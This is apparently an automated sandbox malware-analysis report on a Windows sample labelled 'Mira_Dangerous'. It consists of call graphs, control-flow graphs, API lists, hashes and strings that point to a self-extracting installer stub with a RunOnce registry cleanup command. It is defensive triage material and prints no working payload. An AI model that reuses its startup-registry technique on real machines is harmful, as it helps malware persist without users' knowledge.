callgraph 0 Function_00007FF7A8CC79F0 5 Function_00007FF7A8CC8470 0->5 58 Function_00007FF7A8CC7BA8 0->58 1 Function_00007FF7A8CC33F0 13 Function_00007FF7A8CC4C68 1->13 2 Function_00007FF7A8CC5770 3 Function_00007FF7A8CC6B70 33 Function_00007FF7A8CC1008 3->33 36 Function_00007FF7A8CC7700 3->36 3->58 81 Function_00007FF7A8CC4DCC 3->81 4 Function_00007FF7A8CC5870 27 Function_00007FF7A8CC8494 5->27 6 Function_00007FF7A8CC8870 7 Function_00007FF7A8CC3BF4 7->5 41 Function_00007FF7A8CC7F04 7->41 55 Function_00007FF7A8CC7E34 7->55 56 Function_00007FF7A8CC2834 7->56 7->81 8 Function_00007FF7A8CC3F74 8->36 74 Function_00007FF7A8CC5050 8->74 78 Function_00007FF7A8CC7AC8 8->78 8->81 9 Function_00007FF7A8CC15E8 10 Function_00007FF7A8CC7CE8 9->10 11 Function_00007FF7A8CC7D68 12 Function_00007FF7A8CC2468 12->5 12->81 13->5 14 Function_00007FF7A8CC61EC 14->5 80 Function_00007FF7A8CC204C 14->80 86 Function_00007FF7A8CC7C40 14->86 15 Function_00007FF7A8CC30EC 15->5 15->8 25 Function_00007FF7A8CC5FE4 15->25 28 Function_00007FF7A8CC5D90 15->28 15->36 15->58 60 Function_00007FF7A8CC772C 15->60 63 Function_00007FF7A8CC6CA4 15->63 64 Function_00007FF7A8CC60A4 15->64 67 Function_00007FF7A8CC2318 15->67 15->78 15->81 84 Function_00007FF7A8CC494C 15->84 88 Function_00007FF7A8CC40C4 15->88 89 Function_00007FF7A8CC66C4 15->89 16 Function_00007FF7A8CC12EC 16->5 82 Function_00007FF7A8CC11CC 16->82 17 Function_00007FF7A8CC2A6C 17->5 17->33 17->86 18 Function_00007FF7A8CC8964 19 Function_00007FF7A8CC57E0 20 Function_00007FF7A8CC55E0 21 Function_00007FF7A8CC4A60 21->33 21->81 22 Function_00007FF7A8CC5C60 22->2 22->5 35 Function_00007FF7A8CC5380 22->35 23 Function_00007FF7A8CC8B60 24 Function_00007FF7A8CC64E4 24->3 24->5 24->36 24->58 24->63 92 Function_00007FF7A8CC63B8 24->92 25->60 25->74 25->81 26 Function_00007FF7A8CC8A62 66 Function_00007FF7A8CC8A9C 26->66 28->22 28->74 28->81 29 Function_00007FF7A8CC5690 85 Function_00007FF7A8CC3B40 29->85 30 Function_00007FF7A8CC3910 30->13 30->81 30->85 31 Function_00007FF7A8CC8910 32 Function_00007FF7A8CC8790 34 Function_00007FF7A8CC1C0C 34->5 34->81 35->81 37 Function_00007FF7A8CC1500 37->5 37->13 38 Function_00007FF7A8CC7E00 39 Function_00007FF7A8CC8200 39->18 75 Function_00007FF7A8CC88D0 39->75 77 Function_00007FF7A8CC2C54 39->77 40 Function_00007FF7A8CC8880 41->5 42 Function_00007FF7A8CC1084 43 Function_00007FF7A8CC1684 43->5 43->9 43->11 43->17 43->33 43->42 43->58 43->81 83 Function_00007FF7A8CC114C 43->83 44 Function_00007FF7A8CC8802 45 Function_00007FF7A8CC24F8 45->5 45->81 45->83 46 Function_00007FF7A8CC527C 46->33 46->81 47 Function_00007FF7A8CC58B0 47->2 47->5 47->35 47->46 61 Function_00007FF7A8CC512C 47->61 68 Function_00007FF7A8CC5B18 47->68 93 Function_00007FF7A8CC51BC 47->93 48 Function_00007FF7A8CC78B0 48->5 48->58 49 Function_00007FF7A8CC4A30 50 Function_00007FF7A8CC3530 50->3 50->13 50->21 50->58 50->63 50->81 51 Function_00007FF7A8CC81B0 52 Function_00007FF7A8CC8930 53 Function_00007FF7A8CC8B30 54 Function_00007FF7A8CC2DB4 54->5 54->7 54->16 59 Function_00007FF7A8CC70A8 54->59 54->74 54->78 54->80 54->81 71 Function_00007FF7A8CC261C 56->71 57 Function_00007FF7A8CC1D28 57->5 57->58 57->81 57->83 58->42 59->5 59->10 59->11 59->58 65 Function_00007FF7A8CC7024 59->65 79 Function_00007FF7A8CC8648 59->79 59->81 60->5 60->83 61->33 61->42 62 Function_00007FF7A8CC33A0 63->5 63->36 63->45 63->81 64->36 64->74 64->81 90 Function_00007FF7A8CC2244 67->90 69 Function_00007FF7A8CC8417 70 Function_00007FF7A8CC8818 91 Function_00007FF7A8CC87BC 70->91 71->5 71->33 71->58 72 Function_00007FF7A8CC80D0 72->6 72->70 73 Function_00007FF7A8CC7850 75->40 75->52 76 Function_00007FF7A8CC8750 77->14 77->15 77->34 77->54 77->67 77->81 78->81 79->27 80->5 80->42 80->58 80->80 81->5 81->33 81->41 81->55 81->83 82->5 84->74 84->81 87 Function_00007FF7A8CC3840 87->13 88->0 88->5 88->36 88->43 88->57 88->58 88->74 88->81 88->83 94 Function_00007FF7A8CC473C 88->94 89->5 89->12 89->24 89->36 89->58 89->63 89->74 89->78 89->81 90->5 90->58 92->5 92->33 92->58 92->83 93->78 94->5 94->36 94->67 94->81

Executed Functions

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 0 7ff7a8cc40c4-7ff7a8cc4116 1 7ff7a8cc4139-7ff7a8cc4141 0->1 2 7ff7a8cc4118-7ff7a8cc4133 call 7ff7a8cc5050 0->2 4 7ff7a8cc4145-7ff7a8cc4167 memset 1->4 2->1 9 7ff7a8cc4254-7ff7a8cc427d call 7ff7a8cc4dcc 2->9 6 7ff7a8cc4282-7ff7a8cc4295 4->6 7 7ff7a8cc416d-7ff7a8cc4188 call 7ff7a8cc5050 4->7 8 7ff7a8cc4299-7ff7a8cc42a3 6->8 7->9 18 7ff7a8cc418e-7ff7a8cc4194 7->18 12 7ff7a8cc42a5-7ff7a8cc42ab 8->12 13 7ff7a8cc42b7-7ff7a8cc42c2 8->13 19 7ff7a8cc44ee 9->19 12->13 16 7ff7a8cc42ad-7ff7a8cc42b5 12->16 17 7ff7a8cc42c5-7ff7a8cc42c8 13->17 16->8 16->13 20 7ff7a8cc42ca-7ff7a8cc42e2 call 7ff7a8cc5050 17->20 21 7ff7a8cc4328-7ff7a8cc433d call 7ff7a8cc1684 17->21 22 7ff7a8cc4196-7ff7a8cc419b 18->22 23 7ff7a8cc419d-7ff7a8cc41a0 18->23 27 7ff7a8cc44f0-7ff7a8cc451f call 7ff7a8cc8470 19->27 20->9 38 7ff7a8cc42e8-7ff7a8cc42ef 20->38 21->19 35 7ff7a8cc4343-7ff7a8cc434a 21->35 29 7ff7a8cc41b5 22->29 24 7ff7a8cc41a2-7ff7a8cc41ab 23->24 25 7ff7a8cc41ad-7ff7a8cc41af 23->25 24->29 30 7ff7a8cc41b1 25->30 31 7ff7a8cc41b8-7ff7a8cc41bb 25->31 29->31 30->29 31->17 36 7ff7a8cc41c1-7ff7a8cc41cb 31->36 39 7ff7a8cc436a-7ff7a8cc436c 35->39 40 7ff7a8cc434c-7ff7a8cc4353 35->40 41 7ff7a8cc4231-7ff7a8cc4234 36->41 42 7ff7a8cc41cd-7ff7a8cc41d0 36->42 43 7ff7a8cc42f5-7ff7a8cc4322 CompareStringA 38->43 44 7ff7a8cc45d8-7ff7a8cc45df 38->44 50 7ff7a8cc4372-7ff7a8cc4379 39->50 51 7ff7a8cc4493-7ff7a8cc449b 39->51 40->39 45 7ff7a8cc4355-7ff7a8cc435c 40->45 41->21 52 7ff7a8cc423a-7ff7a8cc4252 call 7ff7a8cc5050 41->52 46 7ff7a8cc41d2-7ff7a8cc41d9 42->46 47 7ff7a8cc41db-7ff7a8cc41dd 42->47 43->21 43->44 48 7ff7a8cc45e5-7ff7a8cc45ec 44->48 49 7ff7a8cc472d-7ff7a8cc472f 44->49 45->39 56 7ff7a8cc435e-7ff7a8cc4360 45->56 57 7ff7a8cc41ea-7ff7a8cc41fb call 7ff7a8cc5050 46->57 47->19 58 7ff7a8cc41e3 47->58 48->49 59 7ff7a8cc45f2-7ff7a8cc4621 RegOpenKeyExA 48->59 49->27 60 7ff7a8cc437f-7ff7a8cc4381 50->60 61 7ff7a8cc4599-7ff7a8cc45d3 call 7ff7a8cc4dcc LocalFree 50->61 53 7ff7a8cc44df-7ff7a8cc44e9 LocalFree 51->53 54 7ff7a8cc449d-7ff7a8cc44a4 call 7ff7a8cc473c 51->54 52->9 52->17 53->19 69 7ff7a8cc44a9-7ff7a8cc44ab 54->69 56->50 65 7ff7a8cc4362-7ff7a8cc4365 call 7ff7a8cc1d28 56->65 57->9 79 7ff7a8cc41fd-7ff7a8cc422d CompareStringA 57->79 58->57 59->49 66 7ff7a8cc4627-7ff7a8cc4666 RegQueryValueExA 59->66 60->51 68 7ff7a8cc4387-7ff7a8cc438e 60->68 61->19 65->39 72 7ff7a8cc471c-7ff7a8cc4728 RegCloseKey 66->72 73 7ff7a8cc466c-7ff7a8cc469b memset GetSystemDirectoryA 66->73 68->51 75 7ff7a8cc4394-7ff7a8cc439f call 7ff7a8cc79f0 68->75 69->53 76 7ff7a8cc44ad-7ff7a8cc44c3 LocalFree 69->76 72->49 77 7ff7a8cc46b3-7ff7a8cc46dc call 7ff7a8cc114c 73->77 78 7ff7a8cc469d-7ff7a8cc46ae call 7ff7a8cc7ba8 73->78 86 7ff7a8cc43a5-7ff7a8cc43c1 GetProcAddress 75->86 87 7ff7a8cc4574-7ff7a8cc4597 call 7ff7a8cc4dcc 75->87 76->44 81 7ff7a8cc44c9-7ff7a8cc44ce 76->81 88 7ff7a8cc46e3-7ff7a8cc46ea 77->88 78->77 79->41 81->4 89 7ff7a8cc4521-7ff7a8cc454e call 7ff7a8cc4dcc FreeLibrary 86->89 90 7ff7a8cc43c7-7ff7a8cc4415 86->90 99 7ff7a8cc4553-7ff7a8cc456f LocalFree call 7ff7a8cc7700 87->99 88->88 92 7ff7a8cc46ec-7ff7a8cc4717 RegSetValueExA 88->92 89->99 93 7ff7a8cc441f-7ff7a8cc4427 90->93 94 7ff7a8cc4417-7ff7a8cc441b 90->94 92->72 97 7ff7a8cc4431-7ff7a8cc4433 93->97 98 7ff7a8cc4429-7ff7a8cc442d 93->98 94->93 101 7ff7a8cc4435-7ff7a8cc4439 97->101 102 7ff7a8cc443d-7ff7a8cc4445 97->102 98->97 99->19 101->102 105 7ff7a8cc444f-7ff7a8cc4451 102->105 106 7ff7a8cc4447-7ff7a8cc444b 102->106 107 7ff7a8cc4453-7ff7a8cc4457 105->107 108 7ff7a8cc445b-7ff7a8cc447e 105->108 106->105 107->108 110 7ff7a8cc4480-7ff7a8cc4491 FreeLibrary 108->110 111 7ff7a8cc44d3-7ff7a8cc44da FreeLibrary 108->111 110->76 111->53
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
  • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$Mira$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
  • API String ID: 2679723528-2018640329
  • Opcode ID: 8509239b70171e5e8f30f25a201f846f3f354706cd48434738ed3a295e3e973f
  • Instruction ID: 7ebe1029317d2bf56a6ce9fe6e5f409da95dc0eec2ffacdead92587e05b09bee
  • Opcode Fuzzy Hash: 8509239b70171e5e8f30f25a201f846f3f354706cd48434738ed3a295e3e973f
  • Instruction Fuzzy Hash: 460293F1A0A64286E720AF10E8406B9FBA0FB84744FD661B5DA4D436B4DF3CD549CF28

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
  • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
  • API String ID: 178549006-3765599613
  • Opcode ID: b299ff31df0d2b05a6531c91114b9e5cd943ed9aaaacf04066293d09cb26884f
  • Instruction ID: 397c2550042197c3ed55f229b7a899685b17b9451ead3de382eb000f81054a2d
  • Opcode Fuzzy Hash: b299ff31df0d2b05a6531c91114b9e5cd943ed9aaaacf04066293d09cb26884f
  • Instruction Fuzzy Hash: FC8194B2A09B4186E710AF11E8542B9F7A0FB89B54FC661B2D94E43764DF3CD509CB18

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 144 7ff7a8cc66c4-7ff7a8cc6724 call 7ff7a8cc5050 LocalAlloc 147 7ff7a8cc6756-7ff7a8cc676a call 7ff7a8cc5050 144->147 148 7ff7a8cc6726-7ff7a8cc6749 call 7ff7a8cc4dcc call 7ff7a8cc7700 144->148 153 7ff7a8cc67a5-7ff7a8cc67ea lstrcmpA LocalFree 147->153 154 7ff7a8cc676c-7ff7a8cc67a3 call 7ff7a8cc4dcc LocalFree 147->154 163 7ff7a8cc674f-7ff7a8cc6751 148->163 157 7ff7a8cc6837-7ff7a8cc683d 153->157 158 7ff7a8cc67ec-7ff7a8cc67ee 153->158 154->163 164 7ff7a8cc6b14-7ff7a8cc6b38 call 7ff7a8cc7ac8 157->164 165 7ff7a8cc6843-7ff7a8cc6849 157->165 161 7ff7a8cc67f0-7ff7a8cc67f9 158->161 162 7ff7a8cc67fb 158->162 161->162 167 7ff7a8cc67fe-7ff7a8cc680e call 7ff7a8cc64e4 161->167 162->167 168 7ff7a8cc6b3a-7ff7a8cc6b66 call 7ff7a8cc8470 163->168 164->168 165->164 166 7ff7a8cc684f-7ff7a8cc6870 GetTempPathA 165->166 170 7ff7a8cc6872-7ff7a8cc687e call 7ff7a8cc64e4 166->170 171 7ff7a8cc68ad-7ff7a8cc68b9 166->171 180 7ff7a8cc6b0f-7ff7a8cc6b12 167->180 181 7ff7a8cc6814-7ff7a8cc6832 call 7ff7a8cc4dcc 167->181 179 7ff7a8cc6883-7ff7a8cc6885 170->179 178 7ff7a8cc68bc-7ff7a8cc68bf 171->178 182 7ff7a8cc68c4-7ff7a8cc68ce 178->182 179->180 183 7ff7a8cc688b-7ff7a8cc6895 call 7ff7a8cc2468 179->183 180->168 181->163 185 7ff7a8cc68e1-7ff7a8cc68f3 182->185 186 7ff7a8cc68d0-7ff7a8cc68d5 182->186 183->171 198 7ff7a8cc6897-7ff7a8cc68a7 call 7ff7a8cc64e4 183->198 187 7ff7a8cc68f9-7ff7a8cc690f GetDriveTypeA 185->187 188 7ff7a8cc6adb-7ff7a8cc6b04 GetWindowsDirectoryA call 7ff7a8cc6ca4 185->188 186->185 191 7ff7a8cc68d7-7ff7a8cc68df 186->191 192 7ff7a8cc6911-7ff7a8cc6914 187->192 193 7ff7a8cc6916-7ff7a8cc692a GetFileAttributesA 187->193 188->163 203 7ff7a8cc6b0a 188->203 191->182 191->185 192->193 196 7ff7a8cc6930-7ff7a8cc6933 192->196 193->196 197 7ff7a8cc69bd-7ff7a8cc69d0 call 7ff7a8cc6ca4 193->197 200 7ff7a8cc6935-7ff7a8cc693f 196->200 201 7ff7a8cc69ad 196->201 211 7ff7a8cc69d2-7ff7a8cc69de call 7ff7a8cc2468 197->211 212 7ff7a8cc69f4-7ff7a8cc6a00 call 7ff7a8cc2468 197->212 198->171 198->180 205 7ff7a8cc69b1-7ff7a8cc69b8 200->205 206 7ff7a8cc6941-7ff7a8cc6953 200->206 201->205 203->178 210 7ff7a8cc6ad2-7ff7a8cc6ad5 205->210 206->205 209 7ff7a8cc6955-7ff7a8cc6981 GetDiskFreeSpaceA 206->209 209->201 214 7ff7a8cc6983-7ff7a8cc69a4 MulDiv 209->214 210->187 210->188 211->201 219 7ff7a8cc69e0-7ff7a8cc69f2 call 7ff7a8cc6ca4 211->219 220 7ff7a8cc6a02-7ff7a8cc6a11 GetWindowsDirectoryA 212->220 221 7ff7a8cc6a16-7ff7a8cc6a3e call 7ff7a8cc7ba8 GetFileAttributesA 212->221 214->201 218 7ff7a8cc69a6-7ff7a8cc69ab 214->218 218->197 218->201 219->201 219->212 220->221 226 7ff7a8cc6a40-7ff7a8cc6a53 CreateDirectoryA 221->226 227 7ff7a8cc6a55 221->227 228 7ff7a8cc6a58-7ff7a8cc6a5a 226->228 227->228 229 7ff7a8cc6a6d-7ff7a8cc6a8e SetFileAttributesA 228->229 230 7ff7a8cc6a5c-7ff7a8cc6a6b 228->230 231 7ff7a8cc6a91-7ff7a8cc6a9b 229->231 230->210 232 7ff7a8cc6aaf-7ff7a8cc6acc call 7ff7a8cc64e4 231->232 233 7ff7a8cc6a9d-7ff7a8cc6aa3 231->233 232->180 237 7ff7a8cc6ace 232->237 233->232 234 7ff7a8cc6aa5-7ff7a8cc6aad 233->234 234->231 234->232 237->210
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
  • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
  • API String ID: 3973824516-3855382519
  • Opcode ID: d6c8b5fd4d55c6658b4f1a5334f7fcaaca393b8f8d38eb7b9bd80be6ad316fe1
  • Instruction ID: 6658dcddf36018200883cd2f6c4dea38dbb651c7598e70d1f445f31af8c034bc
  • Opcode Fuzzy Hash: d6c8b5fd4d55c6658b4f1a5334f7fcaaca393b8f8d38eb7b9bd80be6ad316fe1
  • Instruction Fuzzy Hash: 8BD1D8B2A1A64286EB50AF20D51067AF7A0FF85740FD260B9DA4D436B5DF3DD405CF24

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 238 7ff7a8cc2db4-7ff7a8cc2e4d call 7ff7a8cc8b09 memset * 2 call 7ff7a8cc5050 243 7ff7a8cc30a5 238->243 244 7ff7a8cc2e53-7ff7a8cc2e94 CreateEventA SetEvent call 7ff7a8cc5050 238->244 245 7ff7a8cc30aa-7ff7a8cc30b9 call 7ff7a8cc4dcc 243->245 249 7ff7a8cc2e96-7ff7a8cc2ea0 244->249 250 7ff7a8cc2ec3-7ff7a8cc2ecb 244->250 251 7ff7a8cc30be 245->251 252 7ff7a8cc2ea2-7ff7a8cc2ebe call 7ff7a8cc4dcc 249->252 254 7ff7a8cc2ed5-7ff7a8cc2ef0 call 7ff7a8cc5050 250->254 255 7ff7a8cc2ecd-7ff7a8cc2ecf 250->255 253 7ff7a8cc30c0-7ff7a8cc30e3 call 7ff7a8cc8470 251->253 252->251 265 7ff7a8cc2ef2-7ff7a8cc2efc 254->265 266 7ff7a8cc2efe-7ff7a8cc2f1c CreateMutexA 254->266 255->254 258 7ff7a8cc2fa3-7ff7a8cc2fb3 call 7ff7a8cc70a8 255->258 267 7ff7a8cc2fb5-7ff7a8cc2fbf 258->267 268 7ff7a8cc2fc4-7ff7a8cc2fcb 258->268 265->252 266->258 269 7ff7a8cc2f22-7ff7a8cc2f33 GetLastError 266->269 267->245 270 7ff7a8cc2fde-7ff7a8cc2ffd FindResourceExA 268->270 271 7ff7a8cc2fcd-7ff7a8cc2fd9 call 7ff7a8cc204c 268->271 269->258 272 7ff7a8cc2f35-7ff7a8cc2f48 269->272 274 7ff7a8cc2fff-7ff7a8cc3011 LoadResource 270->274 275 7ff7a8cc3014-7ff7a8cc301b 270->275 271->251 276 7ff7a8cc2f62-7ff7a8cc2f7f call 7ff7a8cc4dcc 272->276 277 7ff7a8cc2f4a-7ff7a8cc2f60 call 7ff7a8cc4dcc 272->277 274->275 281 7ff7a8cc3029-7ff7a8cc3030 275->281 282 7ff7a8cc301d-7ff7a8cc3024 #17 275->282 276->258 287 7ff7a8cc2f81-7ff7a8cc2f9e CloseHandle 276->287 277->287 283 7ff7a8cc3032-7ff7a8cc3035 281->283 284 7ff7a8cc303a-7ff7a8cc3044 call 7ff7a8cc3bf4 281->284 282->281 283->253 284->251 290 7ff7a8cc3046-7ff7a8cc3055 284->290 287->251 290->283 291 7ff7a8cc3057-7ff7a8cc3061 290->291 291->283 292 7ff7a8cc3063-7ff7a8cc306a 291->292 292->283 293 7ff7a8cc306c-7ff7a8cc3073 call 7ff7a8cc12ec 292->293 293->283 296 7ff7a8cc3075-7ff7a8cc30a1 call 7ff7a8cc7ac8 293->296 296->251 299 7ff7a8cc30a3 296->299 299->283
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
  • String ID: $EXTRACTOPT$INSTANCECHECK$Mira$TITLE$VERCHECK
  • API String ID: 3100096412-1777076177
  • Opcode ID: 1e1f08e9617b55e2358bcf68bebb50a442f06fc450e3a76ad8f9db5257c5e185
  • Instruction ID: d34cc9abadb038e5d5eac065ab806bb3f53cb6aad58231b1ca5695357389e7ba
  • Opcode Fuzzy Hash: 1e1f08e9617b55e2358bcf68bebb50a442f06fc450e3a76ad8f9db5257c5e185
  • Instruction Fuzzy Hash: FD819CF1A0A64286F760BB25B8003BAEA90FF84745FC260B5D94D426B4DF7CE445CF28

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 300 7ff7a8cc6ca4-7ff7a8cc6d10 GetCurrentDirectoryA SetCurrentDirectoryA 301 7ff7a8cc6d12-7ff7a8cc6d3a call 7ff7a8cc4dcc call 7ff7a8cc7700 300->301 302 7ff7a8cc6d3f-7ff7a8cc6d7a GetDiskFreeSpaceA 300->302 320 7ff7a8cc6fe9 301->320 304 7ff7a8cc6d80-7ff7a8cc6da8 MulDiv 302->304 305 7ff7a8cc6f63-7ff7a8cc6fb8 memset call 7ff7a8cc7700 GetLastError FormatMessageA 302->305 304->305 308 7ff7a8cc6dae-7ff7a8cc6de4 GetVolumeInformationA 304->308 316 7ff7a8cc6fbd-7ff7a8cc6fe4 call 7ff7a8cc4dcc SetCurrentDirectoryA 305->316 311 7ff7a8cc6de6-7ff7a8cc6e40 memset call 7ff7a8cc7700 GetLastError FormatMessageA 308->311 312 7ff7a8cc6e45-7ff7a8cc6e68 SetCurrentDirectoryA 308->312 311->316 314 7ff7a8cc6e6c-7ff7a8cc6e73 312->314 318 7ff7a8cc6e86-7ff7a8cc6e99 314->318 319 7ff7a8cc6e75-7ff7a8cc6e7a 314->319 316->320 325 7ff7a8cc6e9d-7ff7a8cc6ea0 318->325 319->318 324 7ff7a8cc6e7c-7ff7a8cc6e84 319->324 323 7ff7a8cc6feb-7ff7a8cc701a call 7ff7a8cc8470 320->323 324->314 324->318 327 7ff7a8cc6ea2-7ff7a8cc6eac 325->327 328 7ff7a8cc6eae-7ff7a8cc6eb2 325->328 327->325 327->328 330 7ff7a8cc6eb4-7ff7a8cc6ed3 call 7ff7a8cc4dcc 328->330 331 7ff7a8cc6ed8-7ff7a8cc6edf 328->331 330->320 333 7ff7a8cc6ee1-7ff7a8cc6ee9 331->333 334 7ff7a8cc6f0e-7ff7a8cc6f1f 331->334 333->334 337 7ff7a8cc6eeb-7ff7a8cc6f0c 333->337 335 7ff7a8cc6f22-7ff7a8cc6f2a 334->335 338 7ff7a8cc6f46-7ff7a8cc6f49 335->338 339 7ff7a8cc6f2c-7ff7a8cc6f30 335->339 337->335 341 7ff7a8cc6f4f-7ff7a8cc6f52 338->341 342 7ff7a8cc6f4b-7ff7a8cc6f4d 338->342 340 7ff7a8cc6f32 339->340 343 7ff7a8cc6f54-7ff7a8cc6f5e 340->343 344 7ff7a8cc6f34-7ff7a8cc6f41 call 7ff7a8cc24f8 340->344 341->340 342->340 343->323 344->323
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
  • API String ID: 4237285672-2312194364
  • Opcode ID: 6e762584361d752baa37747b7a7dbfb637054f2efd45ef9d1ea5ad97e5778722
  • Instruction ID: 9484d76a55dfd7f00ec2027dbaa58a9074d233afc16a8fce40354a341699e11a
  • Opcode Fuzzy Hash: 6e762584361d752baa37747b7a7dbfb637054f2efd45ef9d1ea5ad97e5778722
  • Instruction Fuzzy Hash: 6FA1B7B6A1A74187E720AF24E5406BAFBA0FB89744F856179EA4D03B64CF3CD409CF14

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
  • String ID: *MEMCAB$CABINET
  • API String ID: 1305606123-2642027498
  • Opcode ID: 33af6c9407e7061855ebb592c3b8b842de52abeaee4983045e05688ac2eae533
  • Instruction ID: e58877a55ee4e30d79ef3474b1777db79248c36c7010dc93a10364c25904191e
  • Opcode Fuzzy Hash: 33af6c9407e7061855ebb592c3b8b842de52abeaee4983045e05688ac2eae533
  • Instruction Fuzzy Hash: B951EBB1A0AB4286EB10AB11E854375FBA0FB89746FC661B5D94D42774DF3CE049CF28

Control-flow Graph

  • Executed
  • Not Executed
